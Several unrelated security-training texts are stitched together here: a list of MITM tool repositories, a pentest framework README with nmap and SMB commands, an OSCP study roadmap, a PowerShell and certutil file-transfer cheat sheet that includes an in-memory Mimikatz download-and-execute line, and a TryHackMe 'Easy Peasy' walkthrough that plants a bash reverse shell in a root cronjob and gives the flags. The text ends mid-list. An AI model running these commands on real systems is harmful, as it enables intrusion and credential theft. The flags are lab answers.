[windblaze/aegis](https://github.com/windblaze/aegis) MITM protection for MacOS - [**1**ๆ˜Ÿ][2y] [JS] [keygen-sh/example-signature-verification](https://github.com/keygen-sh/example-signature-verification) An example implementation of verifying response signatures using RSA cryptography to prevent tampering with API response payloads, licensing bypasses, MITM attacks, etc. - [**1**ๆ˜Ÿ][2y] [Ruby] [samyoyo/bettercap](https://github.com/samyoyo/bettercap) A complete, modular, portable and easily extensible MITM framework. - [**1**ๆ˜Ÿ][2y] [Java] [vincent-winner/lanmitm](https://github.com/vincent-winner/lanmitm) ไธญ้—ดไบบๆ”ปๅ‡ป-ๅฎ‰ๅ“ - [**0**ๆ˜Ÿ][2y] [Py] [bioverflow/injectionpoint](https://github.com/bioverflow/injectionpoint) MiTM attack to inject JS code in a public WiFi hotspot, initially to cryptocurrency - [**0**ๆ˜Ÿ][6y] [Shell] [ekultek/suddensix](https://github.com/ekultek/suddensix) IPV6 MITM attack tool - [**0**ๆ˜Ÿ][3y] [C#] [klemenb/fiddly](https://github.com/klemenb/fiddly) A simple man-in-the-middle attack tool used for applying filters to the HTTP traffic on the local network. *** ## <a id="4958460c709a66ca528f1732117e8dfd"></a>ๆ”ถ้›† - [**145**ๆ˜Ÿ][2y] [chan9390/awesome-mitm](https://github.com/chan9390/awesome-mitm) Curated List of MitM frameworks on GitHub *** ## <a id="b4959a15647a6dcf79901f76655d0ca8"></a>mitmproxy - [**17196**ๆ˜Ÿ][7d] [Py] [mitmproxy/mitmproxy](https://github.com/mitmproxy/mitmproxy) An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. - [**779**ๆ˜Ÿ][2y] [Py] [secretsquirrel/bdfproxy](https://github.com/secretsquirrel/bdfproxy) Patch Binaries via MITM: BackdoorFactory + mitmProxy. (NOT SUPPORTED) - [**261**ๆ˜Ÿ][2y] [Go] [zboya/gomitmproxy](https://github.com/zboya/gomitmproxy) gomitmproxyๆ˜ฏๆƒณ็”จgolang่ฏญ่จ€ๅฎž็Žฐ[mitmproxy]๏ผŒๅฎž็Žฐhttp(s)ไปฃ็† - [**170**ๆ˜Ÿ][3m] [JS] [wuchangming/node-mitmproxy](https://github.com/wuchangming/node-mitmproxy) node-mitmproxy is an extensible man-in-the-middle(MITM) proxy server for HTTP/HTTPS base on Node.js. - [**96**ๆ˜Ÿ][2y] [Py] [jjf012/passivescanner](https://github.com/jjf012/passivescanner) a passive scanner based on Mitmproxy and Arachni - [**68**ๆ˜Ÿ][1y] [Py] [feeicn/webproxy](https://github.com/feeicn/webproxy) Create an HTTP / HTTPS proxy server based on MITMProxy and log all requests to the log file and parse the log for rewriting into the database. - [**59**ๆ˜Ÿ][2y] [Py] [cortesi/mitmproxy](https://github.com/cortesi/mitmproxy) An interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers - [**23**ๆ˜Ÿ][7m] [TS] [jvilk/mitmproxy-node](https://github.com/jvilk/mitmproxy-node) A bridge between Python's mitmproxy and Node.JS programs. Rewrite network requests using Node.JS! - [**11**ๆ˜Ÿ][12m] [JS] [xtr4nge/fruityproxy](https://github.com/xtr4nge/fruityproxy) FruityProxy allows MITM attacks. MITMproxy inline scripts can be imported. It is possible to set an upstream proxy. FruityProxy is part of FruityWifi project. It provides a RESTful API. - [**7**ๆ˜Ÿ][6m] [Py] [muzuiget/mitmpcap](https://github.com/muzuiget/mitmpcap) ๅฐ†mitmproxy็š„ๆต้‡ๅฏผๅ‡บๅˆฐpcapๆ–‡ไปถ - [**6**ๆ˜Ÿ][1y] [Py] [kr1tzb1tz/mitmproxy_pwnage](https://github.com/kr1tzb1tz/mitmproxy_pwnage) - [**1**ๆ˜Ÿ][6y] [kenjoe41/mitmproxy](https://github.com/kenjoe41/mitmproxy) An interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers # ่ดก็Œฎ ๅ†…ๅฎนไธบ็ณป็ปŸ่‡ชๅŠจๅฏผๅ‡บ, ๆœ‰ไปปไฝ•้—ฎ้ข˜่ฏทๆissue
# haise ## Internal Network Pentest Framework ![](https://github.com/syedumerqadri/haise/blob/master/image.jpg) ## Internal Penetration Testing: An Internal Penetration Test differs from a vulnerability assessment in that it actually exploits the vulnerabilities to determine what information is actually exposed. An Internal Penetration Test mimics the actions of an actual attacker exploiting weaknesses in network security without the usual dangers. This test examines internal IT systems for any weakness that could be used to disrupt the confidentiality, availability or integrity of the network ## Methodology: โ€ข Internal Network Scanning traceroute www.google.com nmap 192.168.1.* โ€ข Port Scanning nmap -p- -T4 -iL sub.txt (Fast Scan) nmap -A 192.168.1.1 (Little Intense and slow) nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 192.168.1.1 nmap -sS -sC -sV -v -p 445 -iL subnet-files.txt nmap -sS -sC -sV -v -p 21 -iL subnet-files.txt Web Ports: 80, 8080, 443 โ€ข Fingerprinting nmap -sV --version-intensity 5 192.168.1.1 nc 192.168.1.1 80 curl -sI http://192.168.1.1 โ€ข Vulnerbility Scanning nmap --script vuln 192.168.1.1 -d nikto dirsearch nessus (https://localhost:8834) โ€ข IDS Penetration Testing lbd 45.34.23.12 wafw00f http://192.168.1.1 โ€ข SMB Enumeration Discover Host: cme smb <subnet> (cme => crackmapexecs) Null Session: cme smb 192.168.24.0/24 -u '' -p '' smbmap โ€“host-file smb-hosts.txt SMB Map: smbmap -H 192.168.1.1 โ€ข Exploit Research https://www.exploit-db.com/ https://www.rapid7.com/db/ https://cxsecurity.com/search/ โ€ข Manual Vulnerability Testing and Verification โ€ข Password Strength Testing rate limiting sparta(tool) โ€ข Infrastructure Mapping (Maltego) DNS Server Firewall Cloud Employ Device Logging Server Directory Service Admin Workstation โ€ข Common Server Misconfiguration โ€ข Administrator Privileges Escalation โ€ข Database Security Controls Testing โ€ข Third-Party/Vendor Security Configuration Testing ## Tool for Automation: Internal network could possibly contain large amount of IPs,So for automation first i generate some one liner commands and then automate them. ## Requirements: 1. Currently only suppourt in Kali 2. download dirsearch and place it /haise/---> here <--- ## Usage: 1. git clone https://github.com/syedumerqadri/haise.git 2. cd haise 3. put all discoverd OR provided cilient IPs on hosts.txt 4. python haise.py You will got the prompt shell ![](https://github.com/syedumerqadri/haise/blob/master/screenshot.png) ## Shell: [exit] [clear] [hosts] list all hosts [alive] check if hosts are alive [ports] port scan of all hosts [dir] Directory Enumuration [headers] Grab Web Headers [scan] Grab Headers, Port Scan and Directory Enumuration for all hosts [ids] Detect Intrusion Detection System [smb] Check for SMB Services ## Results: Discoverd Web Directories: dir_results Discoverd Web headers: headers Port Scan Results: port_scan
Updated posted is at https://ishaqmohammed.me/posts/pwk-oscp-preparation-roadmap/ ### My roadmap for preparing for [OSCP](https://www.offensive-security.com/pwk-oscp/), anyone is free to use this and also feedback and contributions are welcome ### **101s(Enumeration)** **1. DNS 101 (Basics of DNS and DNS enumaeration, DNS Zone Transfers)** Possible misconfigurations and attack vectors [DNS 101](http://www.opsschool.org/dns_101.html) [DNS 201](http://www.opsschool.org/dns_201.html) [DNS Hacking (Beginner to Advanced)](http://resources.infosecinstitute.com/dns-hacking/) **2. SMB 101 (SMB Enumeration,Null Session Enumeration, NetBIOS)** Possible misconfigurations and attack vectors [Just what is SMB?](https://www.samba.org/cifs/docs/what-is-smb.html) [SMB enumeration with Kali Linux โ€“ enum4linux, acccheck and smbmap](https://www.hackercoolmagazine.com/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/) [Windows Null Session Enumeration](https://www.adampalmer.me/iodigitalsec/2013/08/10/windows-null-session-enumeration/) [NetBIOS Enumeration And Null Session](http://nrupentheking.blogspot.com/2011/02/netbios-enumeration-and-null-session.html) [NetBIOS and SMB Penetration Testing on Windows](http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/) [nbtscan Cheat Sheet](https://highon.coffee/blog/nbtscan-cheat-sheet/) **3. SMTP 101 (ENUMERATION)** Possible misconfigurations and attack vectors [SMTP User Enumeration](https://pentestlab.blog/2012/11/20/smtp-user-enumeration/) **4. SNMP 101 (ENUMERATION, MIB Tree)** Possible misconfigurations and attack vectors [SNMP enumeration with snmpenum and snmpwalk](http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html) **5. FTP 101 (Enumeration, File Transfers)** Possible misconfigurations and attack vectors **6. SSH(Enumeration, Port Forwarding)** Possible misconfigurations and attack vectors [SSH Tunneling Explained](https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/) [Port Forwarding in Windows](http://woshub.com/port-forwarding-in-windows/) ### **Tools** **1. NMAP 101 Port Scanning (TCP Connect Scan, UDP Scanning, Using NSE Scripts)** [Hacking Articles:NMAP](http://www.hackingarticles.in/category/nmap/) [NMAP - Port-Scanning: A Practical Approach Modified for better](https://www.exploit-db.com/papers/35425/) **2. Wireshark 101(Capture and display filters, filters)** **3 TCPDump (Filtering Traffic, Advanced header filtering)** **4. Reverse and Bind shell, Transferring Files, Types of shells(tty,pty)** [Netcat Tutorials for Beginner](http://www.hackingarticles.in/netcat-tutorials-beginner/) [Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) [Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/) [7 Linux Shells Using Built-in Tools](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/) [Spawning a TTY Shell](https://netsec.ws/?p=337) [Upgrading simple shells to fully interactive TTYs](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) [Transferring Files from Linux to Windows (post-exploitation)](https://blog.ropnop.com/transferring-files-from-kali-to-windows/) [Netcat without -e? No Problem!](https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/) **5. Recon-NG** [Intro to Recon-ng](https://warroom.securestate.com/recon-ng-tutorial/) [Recon-ng: Usage Guide](https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Usage%20Guide) **6. Metasploit** [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) [Creating Metasploit Payloads](https://netsec.ws/?p=331) ### **Web App Pentesting** **1. LFI(LFI to RCE)** [LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/) [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) [5 ways to Exploit LFi Vulnerability](http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/) **2. RFI(RFI to RCE)** **3. SQL Injection (SQLi to RCE)** [Full SQL Injection Tutorial (MySQL)](https://www.exploit-db.com/papers/13045/) [Client Side Attacks](https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/) ### **Programming** **1. Bash 101** [Bash Handbook](https://github.com/denysdovhan/bash-handbook) [BASH Programming - Introduction HOW-TO](http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html) **2. Python 101** [Python for Pentesters](http://www.pentesteracademy.com/course?id=1) [learnpythonthehardway](https://learnpythonthehardway.org/) **3. Ruby 101** **4. Powershell** **5. Assembly 101** Security Tube: [Assembly Language Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=5) [Windows Assembly Language Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=6) ### **Write codes for the below tasks in all the above mentioned languages:** 1. Write a script to accept user input and ping all the hosts in the given range and display which hosts are alive and which are not 2. Write a script to perform a basic nmap scan on the given host 3. Write a script to crawl hyperlinks from a given file and display them in output ### **OS(Users,Privilages,Groups,UID,UAC)** [A GUIDE TO LINUX PRIVILEGE ESCALATION by Rashid Feroz](https://payatu.com/guide-linux-privilege-escalation/) **1. Post-Exploitation** Priivilage Escalation(Windows and Linux) [Elevating privileges by exploiting weak folder permissions](http://www.greyhathacker.net/?p=738) [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) [Windows Privilege Escalation Commands](http://pwnwiki.io/#!privesc/windows/index.md) [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) [MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux](https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/) [A GUIDE TO LINUX PRIVILEGE ESCALATION by Rashid Feroz](https://payatu.com/guide-linux-privilege-escalation/) [Attack and Defend: Linux Privilege Escalation Techniques of 2016](https://www.sans.org/reading-room/whitepapers/linux/attack-defend-linux-privilege-escalation-techniques-2016-37562) [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) **Buffer Overflows** [Buffer Overflow Attack - Computerphile](https://www.youtube.com/watch?v=1S0aBV-Waeo) [Exploit writing tutorial part 1 : Stack Based Overflows](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) [Useful resources for Learning and Hands on practice for buffer overflows](https://github.com/security-prince/PWK-OSCP-Preparation-Roadmap/blob/master/BOF) ### **MISC** [Dostoevskylabs's PenTest Notes](https://dostoevskylabs.gitbooks.io/dostoevskylabs-pentest-notes/) [This challenge was built to promote the Windows / Linux Local Privilege](https://github.com/sagishahar/challenges#k2) [What is Enumeration?](http://resources.infosecinstitute.com/what-is-enumeration/) [PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained.](http://pwnwiki.io) [Penetration Testing Tools Cheat Sheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) [Common services](http://www.opsschool.org/common_services.html) [CTF Resources - Pen-Test Links](https://cph-sec.github.io/) [Blogposts on Hackthebox solutions, PWK and OSCP](https://0xdf.gitlab.io/) by [@0xdf_](https://twitter.com/0xdf_)
| **Command** | **Description** | | --------------|-------------------| |ย `Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1` | Download a file with PowerShell | | `IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')` | Execute a file in memory using PowerShell | | `Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64` | Upload a file with PowerShell | | `bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe` | Download a file using Bitsadmin | | `certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe` | Download a file using Certutil | | `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh` | Download a file using Wget | | `curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh` | Download a file using cURL | | `php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'` | Download a file using PHP | | `scp C:\Temp\bloodhound.zip [email protected]:/tmp/bloodhound.zip` | Upload a file using SCP | | `scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe` | Download a file using SCP | | `Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"` | Invoke-WebRequest using a Chrome User Agent |
# Easy Peasy Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. [Easy Peasy](https://tryhackme.com/room/easypeasyctf) ## Topic's - Network Enumeration - Web Enumeration - Cryptography - Base64 - Base62 - Binary - Web Poking - Brute Forcing (Hash) - Stegangraphy - Exploiting Crontab ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Enumeration through Nmap Deploy the machine attached to this task and use nmap to enumerate it. 1. How many ports are open? ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ sudo nmap -sC -sV -sS -Pn -p- 10.10.152.0 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 11:42 CEST Nmap scan report for 10.10.152.0 Host is up (0.033s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.16.1 | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: nginx/1.16.1 |_http-title: Welcome to nginx! 6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA) | 256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA) |_ 256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519) 65524/tcp open http Apache httpd 2.4.43 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.43 (Ubuntu) |_http-title: Apache2 Debian Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 48.25 seconds ``` `3` 2. What is the version of nginx? `1.16.1` 3. What is running on the highest port? `65524` ## Compromising the machine Now you've enumerated the machine, answer questions and compromise it! 1. Using GoBuster, find flag 1. ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ gobuster dir -u http://10.10.152.0/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.152.0/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/05 11:44:02 Starting gobuster =============================================================== /hidden (Status: 301) Progress: 119963 / 220561 (54.39%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/10/05 11:51:16 Finished =============================================================== kali@kali:~/CTFs/tryhackme/Easy Peasy$ gobuster dir -u http://10.10.152.0/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.152.0/hidden [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/05 11:52:41 Starting gobuster =============================================================== /whatever (Status: 301) Progress: 75300 / 220561 (34.14%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/10/05 11:57:05 Finished =============================================================== ``` - [view-source:http://10.10.152.0/hidden/whatever/](view-source:http://10.10.152.0/hidden/whatever/) ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ echo 'ZmxhZ3tmMXJzN19mbDRnfQ==' | base64 -d flag{f1rs7_fl4g} ``` `flag{f1rs7_fl4g}` 1. Further enumerate the machine, what is flag 2? - [http://10.10.152.0:65524/robots.txt](http://10.10.152.0:65524/robots.txt) `a18672860d0510e5ab6699730763b250` `flag{1m_s3c0nd_fl4g}` 2. Crack the hash with easypeasy.txt, What is the flag 3? - [http://10.10.152.0:65524/](http://10.10.152.0:65524/) ![](2020-10-05_12-05.png) `flag{9fdafbd64c47471a8f54cd3fc64cd312}` 3. What is the hidden directory? - [view-source:http://10.10.152.0:65524/](view-source:http://10.10.152.0:65524/) ```html <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p> ``` - [Base62 Decode Online Tool](https://www.better-converter.com/Encoders-Decoders/Base62-Decode) `/n0th1ng3ls3m4tt3r` 1. Using the wordlist that provided to you in this task crack the hash what is the password? - [http://10.10.152.0:65524/n0th1ng3ls3m4tt3r/](http://10.10.152.0:65524/n0th1ng3ls3m4tt3r/) ![2020-10-05_12-10.png](2020-10-05_12-10.png) `940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81` ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ john --wordlist=easypeasy.txt --format=gost matrix.hash Using default input encoding: UTF-8 Loaded 1 password hash (gost, GOST R 34.11-94 [64/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status mypasswordforthatjob (?) 1g 0:00:00:00 DONE (2020-10-05 12:14) 20.00g/s 81920p/s 81920c/s 81920C/s mypasswordforthatjob..flash88 Use the "--show" option to display all of the cracked passwords reliably Session completed ``` `mypasswordforthatjob` 1. What is the password to login to the machine via SSH? - [http://10.10.152.0:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg](http://10.10.152.0:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg) ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ steghide extract -sf binarycodepixabay.jpg Enter passphrase: wrote extracted data to "secrettext.txt". kali@kali:~/CTFs/tryhackme/Easy Peasy$ cat secrettext.txt username:boring password: 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001 ``` - [https://www.rapidtables.com/convert/number/binary-to-ascii.html](https://www.rapidtables.com/convert/number/binary-to-ascii.html) `iconvertedmypasswordtobinary` 2. What is the user flag? ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ ssh [email protected] -p 6498 The authenticity of host '[10.10.152.0]:6498 ([10.10.152.0]:6498)' can't be established. ECDSA key fingerprint is SHA256:hnBqxfTM/MVZzdifMyu9Ww1bCVbnzSpnrdtDQN6zSek. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.152.0]:6498' (ECDSA) to the list of known hosts. ************************************************************************* ** This connection are monitored by government offical ** ** Please disconnect if you are not authorized ** ** A lawsuit will be filed against you if the law is not followed ** ************************************************************************* [email protected]'s password: You Have 1 Minute Before AC-130 Starts Firing XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX !!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!! You Have 1 Minute Before AC-130 Starts Firing XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX !!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!! boring@kral4-PC:~$ ls user.txt boring@kral4-PC:~$ cat user.txt User Flag But It Seems Wrong Like It`s Rotated Or Something synt{a0jvgf33zfa0ez4y} boring@kral4-PC:~$ ``` ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ echo "synt{a0jvgf33zfa0ez4y}" | tr '[A-Za-z]' '[N-ZA-Mn-za-m]' flag{n0wits33msn0rm4l} ``` `flag{n0wits33msn0rm4l}` 3. What is the root flag? ``` boring@kral4-PC:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # * * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh boring@kral4-PC:~$ cd /var/www/ ``` ``` kali@kali:~/CTFs/tryhackme/Easy Peasy$ nc -nlvp 9001 ``` ``` boring@kral4-PC:/var/www$ echo "bash -i >& /dev/tcp/10.8.106.222/9001 0>&1" >> .mysecretcronjob.sh ``` ``` root@kral4-PC:~# ls -la ls -la total 40 drwx------ 5 root root 4096 Jun 15 12:40 . drwxr-xr-x 23 root root 4096 Jun 15 01:08 .. -rw------- 1 root root 2 Oct 5 03:45 .bash_history -rw-r--r-- 1 root root 3136 Jun 15 12:40 .bashrc drwx------ 2 root root 4096 Jun 13 15:40 .cache drwx------ 3 root root 4096 Jun 13 15:40 .gnupg drwxr-xr-x 3 root root 4096 Jun 13 15:44 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 39 Jun 15 01:01 .root.txt -rw-r--r-- 1 root root 66 Jun 14 21:48 .selected_editor root@kral4-PC:~# cat .root.txt cat .root.txt flag{63a9f0ea7bb98050796b649e85481845} root@kral4-PC:~# ```
## Enumeration - Ports and its purposes. https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.html ## Banner grabbing to check on all ports ``` nc -nv <IP> <port Number> -C for CLRF ``` ``` telnet <IP> <PORT number> ``` #Nmap scan on all ports ``` nmap -sC -sV -p- -oA full 127.0.0.1 nmap -sU -p- -oA udp 127.0.0.1 ``` ## Go buster command ``` gobuster dir --url http://10.10.10.37 --wordlist /usr/share/wordlists/dirb/common.txt gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.63:50000 -o gobuster-medium.txt ```
# Track Awesome Cyber Security University Updates Daily ๐ŸŽ“ Because Education should be free. Contributions welcome! ๐Ÿ•ต๏ธ [๐Ÿ  Home](/README.md) ยท [๐Ÿ” Search](https://www.trackawesomelist.com/search/) ยท [๐Ÿ”ฅ Feed](https://www.trackawesomelist.com/brootware/awesome-cyber-security-university/rss.xml) ยท [๐Ÿ“ฎ Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) ยท [โค๏ธ Sponsor](https://github.com/sponsors/theowenyoung) ยท [๐Ÿ˜บ brootware/awesome-cyber-security-university](https://github.com/brootware/awesome-cyber-security-university) ยท โญ 488 ยท ๐Ÿท๏ธ Security [ Daily / [Weekly](/content/brootware/awesome-cyber-security-university/week/README.md) / [Overview](/content/brootware/awesome-cyber-security-university/readme/README.md) ] ## [May 26, 2023](/content/2023/05/26/README.md) ### Free Beginner Red Team Path / Level 3 - Crypto & Hashes with CTF practice * [Bypassing UAC](https://tryhackme.com/room/bypassinguac) - Learn common ways to bypass User Account Control (UAC) in Windows hosts. ## [Mar 13, 2023](/content/2023/03/13/README.md) ### Free Beginner Blue Team Path / Level 2 - Security Operations, Incident Response & Threat Hunting * [Hunting for Execution Tactic](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-3) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT\&CK Tactic of Execution (TA0002). * [Hunting for Credential Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-5) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT\&CK Tactic of Credential Access (TA0006). * [Hunting for Persistence Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-2) - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003). * [Hunting for Defense Evation](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-4) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT\&CK Tactic of Defense Evasion (TA0005). ## [Dec 11, 2022](/content/2022/12/11/README.md) ### Free Beginner Blue Team Path / Level 1 - Tools * [IntroSIEM](https://tryhackme.com/room/introtosiem) - Introduction to SIEM. ### Free Beginner Blue Team Path / Level 2 - Security Operations, Incident Response & Threat Hunting * [Hunt Conti with Splunk](https://tryhackme.com/room/contiransomwarehgh) - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server. ## [Aug 18, 2022](/content/2022/08/18/README.md) ### Extremely Hard Rooms to do / Level 5 - Malware and Reverse Engineering * [Year of the Owl](https://tryhackme.com/room/yearoftheowl) - Owl-themed boot to root machine. ## [Jul 20, 2022](/content/2022/07/20/README.md) ### Introduction and Pre-Security / Level 1 - Intro * [Hip Flask](https://tryhackme.com/room/hipflask) - An in-depth walkthrough covering pentest methodology against a vulnerable server. ## [Jun 08, 2022](/content/2022/06/08/README.md) ### Introduction and Pre-Security / Level 1 - Intro * [OpenVPN](https://tryhackme.com/room/openvpn) - Learn how to connect to a virtual private network using OpenVPN.<!--lint enable double-link--> * [Osint](https://tryhackme.com/room/ohsint) - Intro to Open Source Intelligence. * [Shodan.io](https://tryhackme.com/room/shodan) - Learn about Shodan.io and how to use it for device enumeration. ### Free Beginner Red Team Path / Level 2 - Tooling * [Simple CTF](https://tryhackme.com/room/easyctf) - Beginner level CTF. * [Bounty Hacker](https://tryhackme.com/room/cowboyhacker) - A space cowboy-themed boot to root machine. ### Free Beginner Red Team Path / Level 3 - Crypto & Hashes with CTF practice * [Basic Pentesting](https://tryhackme.com/room/basicpentestingjt) - This is a machine that allows you to practice web app hacking and privilege escalation. ### Free Beginner Red Team Path / Level 4 - Web * [Inclusion](https://tryhackme.com/room/inclusion) - A beginner-level LFI challenge. * [Juiceshop](https://tryhackme.com/room/owaspjuiceshop) - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities. * [Jack of all trades](https://tryhackme.com/room/jackofalltrades) - Boot-to-root originally designed for Securi-Tay 2020. * [Bolt](https://tryhackme.com/room/bolt) - Bolt themed machine to root into. ### Free Beginner Red Team Path / Level 5 - Reverse Engineering & Pwn * [CC Ghidra](https://tryhackme.com/room/ccghidra) - This room teaches the basics of ghidra. * [CC Radare2](https://tryhackme.com/room/ccradare2) - This room teaches the basics of radare2. ### Free Beginner Red Team Path / Level 6 - PrivEsc * [Blaster](https://tryhackme.com/room/blaster) - Metasploit Framework to get a foothold. * [Ignite](https://tryhackme.com/room/ignite) - A new start-up has a few security issues with its web server. * [Capture the flag](https://tryhackme.com/room/c4ptur3th3fl4g) - Another beginner-level CTF challenge. ### Free Beginner Blue Team Path / Level 1 - Tools * [Windows 